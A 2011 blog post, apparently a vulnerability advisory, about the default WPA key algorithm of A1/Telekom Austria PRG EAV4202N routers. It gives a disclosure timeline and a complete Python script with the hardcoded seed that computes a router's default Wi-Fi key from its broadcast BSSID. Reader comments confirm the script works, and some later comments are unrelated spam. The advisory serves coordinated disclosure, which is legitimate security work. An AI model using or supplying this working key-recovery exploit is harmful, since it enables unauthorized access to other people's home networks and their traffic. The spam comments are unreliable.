.braindump – RE and stuff

December 4, 2011

A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness

Filed under: advisories,RE — Stefan @ 8:05 pm
'''
title:          A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness
product names:  PRG EAV4202N, PRGAV4202N, PRG 4202 N, P.RG AV4202N
device class:   802.11n DSL broadband gateway
vulnerable:     S/N PI101120401*
not vulnerable: S/N PI105220402* (?)
impact:         critical

product notes:
This device is manufactured by ADB Broadband (formerly Pirelli Broadband) and is rebranded for
A1 (formerly Telekom Austria). A Wi-Fi AP is enabled by default and can be accessed with the
default WPA-key printed on the back of the device.

vulnerability description:
The algorithm for the default WPA-key is entirely based on the internal MAC address (rg_mac).
rg_mac can either be derived from BSSID and SSID (if not changed) or BSSID alone.

timeline:
2010-11-20 working exploit
2010-12-04 informed Telekom Austria
2010-12-06 TA requests exploit code
2010-12-07 PoC sent
2010-12-09 TA starts analysis with ADB Broadband
2010-12-17 analysis finished
2010-12-20 vulnerability confirmed, will be fixed in next hardware(!) revision
...
2011-03-10 TA discloses vulnerability to press
2011-03-10 TA confirms that they will not inform affected customers directly
2011-12-04 grace period over

references:

http://broadband.adbglobal.com/medias/images/products/prg_av4202n/data_sheet_p_rg_av4202n.pdf


http://futurezone.at/produkte/2165-massives-sicherheitsproblem-bei-telekom-modems.php


http://help.orf.at/stories/1678161/

'''

import sys, re, hashlib

def gen_key(mac):
    seed = ('\x54\x45\x4F\x74\x65\x6C\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x94\x3F\xDC\xE8')
    lookup = '0123456789ABCDEFGHIKJLMNOPQRSTUVWXYZabcdefghikjlmnopqrstuvwxyz'

    h = hashlib.sha256()
    h.update(seed)
    h.update(mac)
    digest = bytearray(h.digest())
    return ''.join([lookup[x % len(lookup)] for x in digest[0:13]])

def main():
    print '*********************************************************************'
    print ' A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness'
    print '                 Stefan Viehboeck <@sviehb> 11.2010'
    print '*********************************************************************'

    if len(sys.argv) != 2:
        sys.exit('usage: pirelli_wpa.py [RG_MAC] or [BSSID]\n eg. pirelli_wpa.py 38229D112233\n')

    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')

    mac = bytearray.fromhex(mac_str)
    print 'based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (mac[3], mac[4], mac[5])
    print 'WPA key: %s\n' % (gen_key(mac))

    mac[5] -= 5
    print 'based on BSSID:\nSSID: PBS-%02X%02X%02X' % (mac[3], mac[4], mac[5])
    print 'WPA key: %s\n' % (gen_key(mac))

if __name__ == "__main__":
    main()
About these ads

8 Comments »

  1. It is really scaring how A1 ignores vulnerabilities in their routers like the PRGAV4202 and the TG585v6. As a result Austria is a paradise for “bad”-hackers.
    I would like that A1 cares a bit more about the security of their customers. (For instance, they aren’t using passwords on their SMTP-Servers at all!)

    From now on all routers that are used by A1 can be hacked simply by using a little Python-Script. Sadly, that says everything.

    Johannes

    Comment by Johannes Mittendorfer — December 27, 2011 @ 11:45 am | Reply

    • Shouldn’t it be ‘return ”.join([lookup[x % len(lookup)] for x in digest[0:13]])’ on line 48? With the code given above, there is missing the last character of the key. (tested with my own wifi)

      Comment by Johannes Mittendorfer — December 28, 2011 @ 9:09 am | Reply

      • Correct, the default key has a length of 13, not 12. Just verified this with an “old” PRGAV4202.

        I disagree with you on your statement regarding all A1 routers being vulnerable though – it’s a very generalized and also uninformed statement which is far from the truth. Don’t get me wrong, I think the company handled the issue in a very low-key and non-customer oriented manner. At the same time, taking into account it is a huge corporation, it will usually care about itself first. This issue is potentially damaging to the reputation (which is already scratched due to numerous scandals unrelated to WiFi security). All big corporations are usually “evil” when it comes to the ethical side. It’s money vs. ethics, and a company (especially this size) will almost always opt for the money (and PR, etc., sorry to generalize). Taking this into account, it is understandable they acted as they did. This does not mean that I approve of this behaviour – to be honest, I absolutely don’t. It helps me understand the Why though.

        A1 is still using the PRGAV4202 as their default end customer ADSL and VDSL device, however they implemented the necessary change in the automatic generation of the WPA keys in Q1 last year (2011) with Pirelli Broadband, maybe a bit sooner. Models which were produced in 11/2010 which I have access to are still vulnerable to Stefan’s Python script (obviously). Another PRGAV4202 from 03/2011 already has a newly calculated WPA key. The new models have 24-digit WPA keys (0-9;a-z;A-Z). It is beyond my abilities to reverse engineer the calculation of these codes, and I *do* hope they added salt. Stefan’s script does not work on these routers (yes, I tried a few of them, and changing the script’s output to 24 digits does not yield the correct key).

        The dreaded TG585v6 and the “old” PRGAV4202 surely form a sizable fleet of by-default-vulnerable routers, no question, which is bad news for A1 users in Austria, especially the less tech-savvy ones – as most endusers have no sensitivity for computer security, and most staff that deal with end users (no matter whether it’s a shop or the serviceline) have none of that as well. The field technicians probably don’t bother either because #1) they don’t know any better and/or #2) don’t have the time to explain and (in the end) maybe even unsettle the poor soul in front of them.

        Internet access has become a household product, which is why companies need to find ways to deal with large-scale security issues such as this one. The hackers are always moving faster than for-profit companies, so all they can do is react once a vulnerability is known. And they need to do it swiftly and properly – even if it costs money. But that’s my bubble right there, don’t make it pop ;-)

        Anyway, after all, they (A1) did something about the issue decently quick considering they have to coordinate with their hardware supplier and get rid of the stock of vulnerable devices. Although – I have seen “old” models which were probably sent back to Pirelli for updates since they had a new label glued across the old one – with a new and improved WPA code.

        Props to Stefan for finding the vulnerability (plus the WPS one) and making infosec more interesting yet again – and props for giving A1 a grace period of a year which allowed more updated routers to circulate.

        Comment by Syn — January 3, 2012 @ 11:31 pm

  2. Do you also know the key generation algorithm for the german easyboxes?
    I can’t seem to find any code that shows how it’s done and I don’t want to reverse engineer the hole firmware if it means inventing the wheel again.

    Comment by BlackLotus — December 29, 2011 @ 11:44 pm | Reply

  3. [...] [...]

    Pingback by Prelli PRGAV4202N default wpa key — May 31, 2012 @ 9:58 am | Reply

  4. If you want to add better encryption to your phone, then you can use L2TP, and if you want great encryption
    for Mac, Linux, or Windows, then you can use
    Open – VPN. You no longer can remove these troublesome
    programs from your computer, you do not have the permissions to see
    them, and you certainly don’t have the permissions to manipulate them. You could potentially do this with proxies, but you’d have to find a fresh, reliable, and available proxy server from scratch each time.

    Comment by Install Snow Leopard On Pc — July 23, 2013 @ 4:42 am | Reply

  5. I have had issues in the past with apps that allowed users
    to scan, but fortunately this scanner worked perfectly.
    You will get over selfishness and become a whole person who is concerned about other people.

    All parties should leave feeling that they received a fair
    deal.

    Comment by How To Look Attractive — July 23, 2013 @ 8:00 am | Reply

  6. ulgari Anish Kapoor B. ZERO1 Ring Rose Platinum and Steel He since traveled to Belgium and Israel to promote intercontinental diamond sellers and it is effective as an consultant for DBC Diamonds a major international consortium of diamond marketers. Containers are actually uncovered created from wood with various compartments for every perfume. Really advanced decorations plus arabesques were obtained with filigree, though enameling was favoured for representations of plants and birds. So with coloured gems it truly is quite easy to enjoy with colour and round the other hand full the fashion statement that continues.
    [url=http://www.carlinos.org/p-107.html]http://www.carlinos.org/p-107.html[/url] 最も人気で、最も愛して?ブルガリ ネックレス(BVLGARI ネックレス)ブルガリ チャーム PLACE VENDOME【ヴァンドーム】 イエローゴールド CN853375 (チャームのみ)
    [url=http://www.carlinos.org/p-232.html]http://www.carlinos.org/p-232.html[/url] ランキング入賞★ブルガリ 財布(BVLGARI 財布)ブルガリ 長財布 ブルガリ マキシレッタレ ロゴマニア ジャガード 長財布 ブラック 25115
    provides 8 diverse assortments with its best-selling mountings, and likewise offers jewelers the possibility to handpick his or hers mixes. Pearl jewelry which includes the pearl necklace, pearl earrings, pearl pendants, pearl rings and pearl bracelets complements your complete apparel and ladies typically are going to opt for any established that matches made from or shade of their particular costume. We are searching forward to establishing a terrific enterprise connection with purchasers from worldwide. To learn more in relation to Adolf jewlers and what styles of jewlery they supply somekeyword. Toothpaste and baking soda are two in the regular home materials that women and men use to clean outdated gold jewelleries. http://www.carlinos.org/

    Comment by FrerlogsnArge — November 28, 2013 @ 7:26 am | Reply


RSS feed for comments on this post. TrackBack URI

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 57 other followers